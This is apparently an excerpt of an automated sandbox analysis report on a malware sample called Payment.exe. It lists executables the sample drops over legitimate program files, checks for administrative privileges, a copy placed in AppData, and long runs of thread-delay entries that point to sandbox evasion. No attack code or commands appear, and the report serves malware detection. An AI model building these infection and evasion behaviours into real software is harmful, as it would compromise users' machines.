Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Windows\System32\SgrmBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_19-5704
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_21-5705
Source: C:\Users\user\Desktop\Payment.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_8-117701
Source: C:\Windows\System32\Spectrum.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_27-5647
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_28-5727
Source: C:\Windows\System32\AppVClient.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_14-5640

Source: C:\Windows\SysWOW64\perfhost.exe	API coverage: 5.2 %
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	API coverage: 9.9 %

Source: C:\Users\user\Desktop\Payment.exe TID: 4456	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5432	Thread sleep count: 5125 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7348	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2916	Thread sleep count: 212 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7884	Thread sleep count: 4991 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -599812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -599550s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -599293s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -599185s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7884	Thread sleep count: 4034 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -599076s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -598968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -598858s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -598421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -598311s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -598093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -597971s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -597849s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -597718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -597390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -597280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -597171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -597058s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -596951s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -596842s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -596372s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -596252s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -596128s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -595867s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -595701s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -595588s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -595463s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -595308s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -594986s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -594691s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -594562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -594453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -594328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -594218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -594109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -593997s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -593886s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -593765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -593655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -593538s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -593419s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -593297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -593178s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -593047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -592923s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe TID: 7852	Thread sleep time: -592797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 8008	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\msdtc.exe TID: 7728	Thread sleep count: 483 > 30
Source: C:\Windows\System32\msdtc.exe TID: 7728	Thread sleep time: -48300s >= -30000s
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7876	Thread sleep count: 7281 > 30
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7876	Thread sleep time: -72810000s >= -30000s
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7876	Thread sleep count: 2716 > 30
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7876	Thread sleep time: -27160000s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 7904	Thread sleep time: -850000s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -599843s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -599734s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -599625s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -599516s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -599404s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -599296s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -599076s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -598968s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -598858s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -598649s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -598547s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -598438s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -598320s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -598188s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -598078s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -597963s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -597750s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -597640s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -597532s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -597422s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -597313s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -597178s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -597047s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -596938s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -596601s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -596373s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -596265s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -596122s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -595986s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -595875s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -595766s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -595656s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -595542s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -595438s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -595328s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -595219s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -595110s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -595000s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -594694s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -594448s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -594342s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -594234s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -594101s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -594000s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -593891s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -593773s >= -30000s
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe TID: 2640	Thread sleep time: -593672s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7696	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\perfhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\perfhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Payment.exe

Code function: 8_2_02E4DF57 FindFirstFileW,

8_2_02E4DF57

Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599812	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599550	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599293	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599185	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 599076	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598858	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598311	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597971	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597849	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597280	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597171	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 597058	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596951	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596842	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596372	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596252	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596128	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 595867	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 595701	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 595588	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 595463	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 595308	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594986	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594691	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 594109	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593997	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593886	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593765	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593655	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593538	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593419	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593297	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593178	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 593047	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 592923	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Thread delayed: delay time: 592797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599843
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Thread delayed: delay time: 599734
